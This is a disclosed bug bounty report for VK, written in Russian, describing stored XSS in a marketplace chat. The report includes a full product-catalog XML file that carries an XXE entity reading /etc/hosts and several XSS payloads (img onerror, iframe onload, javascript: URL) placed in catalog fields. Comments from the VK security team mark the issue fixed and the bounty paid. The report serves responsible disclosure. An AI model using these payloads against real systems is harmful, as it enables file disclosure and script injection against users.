XSS в чате
Заливаем товар через этот файл, оформляем покупку и в чате видим ХСС!
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/hosts"> ]> <yml_catalog date="2021-04-01 12:20"> <shop> <name>vk.com?'/"><img/src=x/onerror=alert();></name> <company>vk.com?'/"><img/src=x/onerror=alert();></company> <url>javascript:alert();//</url> <currencies> <currency id="RUB" rate="1"/> </currencies> <categories> <category id="1">&ent;</category> <category id="243">Стикеры кот'\"><img src=x onerror=alert();>ики</category> <category id="3">Стикеры пёсики</category> </categories> <offers> <offer id="30125845454553d941-1" available="true" group_id="3012845391"> <price>12</price> <currencyId>RUB</currencyId> <categoryId>1</categoryId> <categoryId>2</categoryId> <categoryId>243</categoryId> <name>dssddsdd1s</name> <description>Этfdот яркий и смелый кот dsdsdsdssdотлично дополнит любое ваше сообщение</description> <param name="Цвsdsddssddssdd<iframe onload=alert();>>">Цвеdsтной</param> <picture>https://vk.com/sticker/51635/512.png</picture> </offer> </offers> </shop> </yml_catalog>
Reward
₽60,000
VKontakte
VK
Report No.: 2266
Created: July 5, 2023, 22:31
Disclosed: March 28, 11:58
Status: Fixed
Type: Vulnerability
Severity:
High
Author:circuit
Comments
By
MrYadro
July 6, 2023
By
MrYadro
July 6, 2023
Добрый день!
Спасибо за репорт. Изучим и вернемся в ближайшее время.
С уважением, VK Security Team
By
wellenc_lex_vk
July 13, 2023
By
VK
July 24, 2023
Reward assigned: ₽60,000.00
By
4k
December 27, 2023
By
4k
December 27, 2023
Добрый день!
Поправили, пожалуйста, проверьте
С уважением,
VK Security Team
VK Security Team
By
wellenc_lex_vk
February 6, 2024
Добрый день!
Благодарим вас за отчет и вклад в безопасность VK!
Мы ценим ваше время и желание сделать наши сервисы безопаснее.
Мы не получили от вас какой-либо новой информации об уязвимости, поэтому данный отчет закрываем, спасибо за участие в нашей Bug Bounty программе.
С уважением, VK.
By
wellenc_lex_vk
February 6, 2024